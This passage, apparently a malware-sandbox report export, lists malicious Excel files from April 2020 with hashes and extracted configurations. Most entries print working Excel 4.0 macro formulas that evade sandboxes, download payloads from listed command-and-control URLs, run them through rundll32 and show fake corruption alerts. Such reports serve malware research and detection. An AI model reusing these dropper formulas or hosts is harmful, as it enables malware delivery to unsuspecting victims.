":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VuwcRaOxkQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8400be0877e34a19dc26ae156f1ccececc07de8ab634d145d9582321b3218e6"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a8400be0877e34a19dc26ae156f1ccececc07de8ab634d145d9582321b3218e6","filesize":144384,"md5":"17e275ab24fca5a0a18878cd4d84801c","sha1":"4f14d8b77b2c010135e877470afdcd6f5fd12628","sha256":"a8400be0877e34a19dc26ae156f1ccececc07de8ab634d145d9582321b3218e6","sha512":"aa291434fdd48980f2c1e3c1fb40178240a74aa9be44de3a67cf876cbd771a94457d1434c04ca1b6005ec7e4a4e170bde0874fd0c0f1c4bea87f933f1ded56bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8400be0877e34a19dc26ae156f1ccececc07de8ab634d145d9582321b3218e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"wuIl39FRf8\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a85dd50fb267b05822b3b1c79c94867d59ea284725689a8b4e12eaa9bf56b27e"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a85dd50fb267b05822b3b1c79c94867d59ea284725689a8b4e12eaa9bf56b27e","filesize":141824,"md5":"d88ef6eddfcff2d63801793974a0db17","sha1":"1de2385922a3ee24df7a477e88b8407fb7c38b98","sha256":"a85dd50fb267b05822b3b1c79c94867d59ea284725689a8b4e12eaa9bf56b27e","sha512":"100577818cd7749fdf59855fc1dc9ac0833604cd369fa1e87561ba437c7e7a09ecb04e5d412079cf261ed27e6dce2b520a690cc29f6c450d43ec2c904d4db237","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a85dd50fb267b05822b3b1c79c94867d59ea284725689a8b4e12eaa9bf56b27e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"5v33AG2xPP\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a868fca99287ab664f8b3e45f211e6befb827cfbf2d340e8244abcb09d1e2690"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a868fca99287ab664f8b3e45f211e6befb827cfbf2d340e8244abcb09d1e2690","filesize":142848,"md5":"528bd817c2f96fcb833b704dccd3da8f","sha1":"972eb917de6941b63e6570fd494aa32f844657d6","sha256":"a868fca99287ab664f8b3e45f211e6befb827cfbf2d340e8244abcb09d1e2690","sha512":"962211c90860c250c6271cad295133503046051fbca17af4845e9f2fac7270ba2fffa311f4a95e168bdb8adfd9e54516aa8aa3c64e2e49707339f1ce90140554","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a868fca99287ab664f8b3e45f211e6befb827cfbf2d340e8244abcb09d1e2690.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9HqbjUdcYL\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a895a7f0e59f0968ca32d642138b2c3c88797aaee1cd59b3ecdc72f54903ee94"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a895a7f0e59f0968ca32d642138b2c3c88797aaee1cd59b3ecdc72f54903ee94","filesize":160768,"md5":"8471a8c268bf9ee0b7ee6e13e3b2a7a5","sha1":"9bed14bb7cbfa55fddd254318e4b1adc72e9f5e1","sha256":"a895a7f0e59f0968ca32d642138b2c3c88797aaee1cd59b3ecdc72f54903ee94","sha512":"af00305e2f5064febadc885f31d9ceaa7e8921e9b6b26f6b5428c14132c35f51f9335f0e919ccab085f405ad78b5991d886d15451fbfb9966d7317e76588258c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a895a7f0e59f0968ca32d642138b2c3c88797aaee1cd59b3ecdc72f54903ee94.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"71ZSJ6R0zj\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a89dce7937f8fa9c69562407700a51f900922c86f3a017464e9602c00737d8a0"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a89dce7937f8fa9c69562407700a51f900922c86f3a017464e9602c00737d8a0","filesize":152576,"md5":"15de06a8c5366ba3e9213ba6fc1bbff7","sha1":"a860effee52cedc136e66b59cb036e60ae3b9deb","sha256":"a89dce7937f8fa9c69562407700a51f900922c86f3a017464e9602c00737d8a0","sha512":"4c2d32236f7645caf28426d9f0f4648a18f45d09e0fba3df4f0a82d5d2de3ddde6c9c180c1fa33ad9ac517012754e971eb0a704414cda474c04b9bc68c6f104f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a89dce7937f8fa9c69562407700a51f900922c86f3a017464e9602c00737d8a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TRnKif2AgC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a89eaa9aa8551066081859159ab3ece0ca17137dcb9b4d78d82447e8e21a534b"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a89eaa9aa8551066081859159ab3ece0ca17137dcb9b4d78d82447e8e21a534b","filesize":209920,"md5":"a3505286f19d95fe47c234b5256bbf02","sha1":"03f8014725aed364a36f16acd9597e175d080df8","sha256":"a89eaa9aa8551066081859159ab3ece0ca17137dcb9b4d78d82447e8e21a534b","sha512":"a0bb3abaceef57b57d9dc70cf2fbd9b316c8df4113e77fee99c9febffdcdb6179a633ad4f5f9fd5b3604b998f8f7464b7ba66c97899902aca913d9f4c9c43f4f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a89eaa9aa8551066081859159ab3ece0ca17137dcb9b4d78d82447e8e21a534b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vmBTubQxN2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8abc1b276c97df97cfd860aeb6558b872abfb2e10549eca02d719a3fc2ca95b"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a8abc1b276c97df97cfd860aeb6558b872abfb2e10549eca02d719a3fc2ca95b","filesize":47616,"md5":"6fac9429afa5c2ce73ce88c7303c8c0b","sha1":"f02c97aade89d33b72a75a1642dfa803e2fa0c36","sha256":"a8abc1b276c97df97cfd860aeb6558b872abfb2e10549eca02d719a3fc2ca95b","sha512":"b388992fcad7622c2c23946e4db3a710da95091ed293f332edf7bc4186142026bfac91d85363faace5d8c986ca7405d8d461316a79d022ee7061febd3456183f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8abc1b276c97df97cfd860aeb6558b872abfb2e10549eca02d719a3fc2ca95b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$18C$3,R$28C$3,R$35C$3,R$41C$3,R$49C$3,R$59C$3,R$58C$7,R$51C$7,R$45C$7,R$35C$7,R$26C$7,R$17C$7)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8add48c1ae880165e42b16487dcd5320d1bed43b9f675c2ae0f69ca150817e9"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a8add48c1ae880165e42b16487dcd5320d1bed43b9f675c2ae0f69ca150817e9","filesize":113664,"md5":"90a9ffeaa511180cde2225d302aac325","sha1":"c66253c0406c1c68c0ffa0d1a5323191298d74fe","sha256":"a8add48c1ae880165e42b16487dcd5320d1bed43b9f675c2ae0f69ca150817e9","sha512":"eda5a99b0b08d942810fc3506f3539d0c8d075a62accd51f7c5f1f69b98b5df1636c72bd8b0c78af8be66b5cb085a26edbbd0b9494793f8d19e6f4c996880880","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8add48c1ae880165e42b16487dcd5320d1bed43b9f675c2ae0f69ca150817e9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oVfWyXp6Km\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8bfe1a9342d4c31ef9af28b00cfed40bede60522fb5642b4302c66fe2511217"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a8bfe1a9342d4c31ef9af28b00cfed40bede60522fb5642b4302c66fe2511217","filesize":152576,"md5":"2e8f0c397a5a1e53aa69bc76d9506ccd","sha1":"59c23495e3ecce3edb930b2e533fa114618ec5c6","sha256":"a8bfe1a9342d4c31ef9af28b00cfed40bede60522fb5642b4302c66fe2511217","sha512":"e08c8753c703ee4d41215b1a98e179573a05c0d89d6cec65b1054d81ef7fd203a059f782f65db1b87ee6a2adbe28c443bfd7fad529c97e42574c2fb740c6ea02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8bfe1a9342d4c31ef9af28b00cfed40bede60522fb5642b4302c66fe2511217.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bJLIxQoNmZ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8d1ee8fe2ff741903f4ceb32a7c3870a53487f8a68fc31a728e595cdc1c16b6"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a8d1ee8fe2ff741903f4ceb32a7c3870a53487f8a68fc31a728e595cdc1c16b6","filesize":185344,"md5":"c334677a71b8cdb95815060287510258","sha1":"c30e98e1641c7f393f9e3792353de6c82a7f5030","sha256":"a8d1ee8fe2ff741903f4ceb32a7c3870a53487f8a68fc31a728e595cdc1c16b6","sha512":"0e4488e6dbbfd762ea47ffe8430bd63fad8616056a078ed29f5bdd8a3e0968dda5730b95e6db53b90f5fb22e9ffa24900669ebc44a5f44c9ac432a2fb86eae0f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8d1ee8fe2ff741903f4ceb32a7c3870a53487f8a68fc31a728e595cdc1c16b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8de2a85a1c162c3bca8bd420ee7b5f0d813242124483d5c7446b0147cb0b560"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a8de2a85a1c162c3bca8bd420ee7b5f0d813242124483d5c7446b0147cb0b560","filesize":214016,"md5":"b365e53dd3a9fd43bddf971d49dc1531","sha1":"86f94fe39e24cffec9c9b2ca7423d6a0f35a1454","sha256":"a8de2a85a1c162c3bca8bd420ee7b5f0d813242124483d5c7446b0147cb0b560","sha512":"1377046f2248c9d939e70fa9de180a5358c4f97f8719243e0f6945be079ca8891cb74935101f2b18715f94e2d807661897188e3a211f0dce1b8d03582b389f02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8de2a85a1c162c3bca8bd420ee7b5f0d813242124483d5c7446b0147cb0b560.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Aw4VC1PETD\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8e08ebaf8e3b2ff299476b15f2fb86f718e1be5b358b139fb0f05f42b93432e"},"analysis":{"reported":"2020-04-09T16:18:12Z","score":10},"files":[{"filename":"a8e08ebaf8e3b2ff299476b15f2fb86f718e1be5b358b139fb0f05f42b93432e","filesize":219136,"md5":"9886f8c3fa25ee553d9bbf7fbae49b0f","sha1":"8a4a79983821a24df159052e0176f51e19a4ccc7","sha256":"a8e08ebaf8e3b2ff299476b15f2fb86f718e1be5b358b139fb0f05f42b93432e","sha512":"fcd4e3f97cb58863e9c833ccefc45877d81f47adb29a1f4293e22a0d1d47a78c1aacacf4f4ac8551f3c0a61e72ef5c9177b7ce76884d9996139112608e4b06b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8e08ebaf8e3b2ff299476b15f2fb86f718e1be5b358b139fb0f05f42b93432e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p4CcNX3gcn\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a97150093bc0aa7375462d3402d03ae61ab21d6c124a00899c32febc1023195f"},"analysis":{"reported":"2020-04-09T16:18:13Z","score":10},"files":[{"filename":"a97150093bc0aa7375462d3402d03ae61ab21d6c124a00899c32febc1023195f","filesize":116224,"md5":"6328353a10fa16b9409bbc8e316552ed","sha1":"d6ca59489f4e9fd9923f8010c30d62b921d88166","sha256":"a97150093bc0aa7375462d3402d03ae61ab21d6c124a00899c32febc1023195f","sha512":"99a98a4374cc3be1190eaaf8a21dd8aaab3cb81d6a1f5ef48623097c88691d9cf318c07a3b1fdc64e8f4c297b2507256d96f5ef2ec5906998e6235b104d0aea0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a97150093bc0aa7375462d3402d03ae61ab21d6c124a00899c32febc1023195f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PJUsZSCaeF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a9941dca920c4c20c31023fae16958b70ac6c3b38122c0017b7421887f42afec"},"analysis":{"reported":"2020-04-09T16:18:13Z","score":10},"files":[{"filename":"a9941dca920c4c20c31023fae16958b70ac6c3b38122c0017b7421887f42afec","filesize":185344,"md5":"baa4ae1b30fa79d331b5437821c1df08","sha1":"a05d2d4f26b2f9f14c638f67c2edc2e52acd62eb","sha256":"a9941dca920c4c20c31023fae16958b70ac6c3b38122c0017b7421887f42afec","sha512":"b3ead1337ca039c9c0224ff7630cefed572f5ff2021fb2e3e1b76db81dba4a86ee5d1792cb8fdda1bdd32e62e4452e0020d75c4dcb44174c3e289e37902c077d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a9941dca920c4c20c31023fae16958b70ac6c3b38122c0017b7421887f42afec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a9afa63c4b148457685b2dcfb8f2f1198fc8b75e7a9ffddce95797f58b0bebb4"},"analysis":{"reported":"2020-04-09T16:18:13Z","score":10},"files":[{"filename":"a9afa63c4b148457685b2dcfb8f2f1198fc8b75e7a9ffddce95797f58b0bebb4","filesize":116224,"md5":"2435e7f0b884451c3d41a9f83ac4c5ca","sha1":"272c86501da77c429d1e5369b2d89439a121d621","sha256":"a9afa63c4b148457685b2dcfb8f2f1198fc8b75e7a9ffddce95797f58b0bebb4","sha512":"c01f81ac924e398a44fc5398f2e9fd5bf705f1f29f7b9c484264821556eea6b01605a1cdaffdcee18514cc6961837a149a1b4a55e05fe03aa326e8c7aa409262","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a9afa63c4b148457685b2dcfb8f2f1198fc8b75e7a9ffddce95797f58b0bebb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 